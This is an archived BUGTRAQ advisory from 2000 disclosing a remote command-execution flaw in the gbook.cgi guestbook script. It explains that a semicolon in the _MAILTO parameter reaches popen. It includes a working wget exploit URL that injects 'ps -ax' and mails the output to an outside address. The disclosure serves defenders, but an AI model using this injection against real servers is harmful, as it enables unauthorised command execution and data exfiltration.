[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[hacksware] gbook.cgi remote command execution vulnerability

To: BUGTRAQ@SECURITYFOCUS.COM
Subject: [hacksware] gbook.cgi remote command execution vulnerability
From: JW Oh <mat@IVNTECH.COM>
Date: Fri, 10 Nov 2000 20:38:44 +0900

   Bug Report

1. Name: gbook.cgi remote command execution vulnerability
2. Release Date: 2000.11.10
3. Affected Application:
  GBook - A web site guestbook
     By Bill Kendrick
     kendrick@zippy.sonoma.edu
     http://zippy.sonoma.edu/kendrick/
4. Author: mat@hacksware.com
5. Type: Input validation Error

6. Explanation
 gbook.cgi is used by some web sites.
 We can set _MAILTO parameter, and popen is called to execute mail command.
 If ';' is used in _MAILTO variable, you can execute arbitrary command with 
it.
 It's so trivial. :)
7. Exploits
 This exploit executes "ps -ax" command and sends the result to haha@yaho.com.

 wget 
"http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha@yaho.com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe@yaho.com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few"


=================================================
|               mat@hacksware.com               |
|             http://hacksware.com              |
=================================================

Prev by Date: [slackware-security] buffer overflow vulnerability in Pine
Next by Date: Re: sadmind exploits (remote sparc/x86)
Prev by thread: [slackware-security] buffer overflow vulnerability in Pine
Next by thread: Re: sadmind exploits (remote sparc/x86)
Index(es):
- Date
- Thread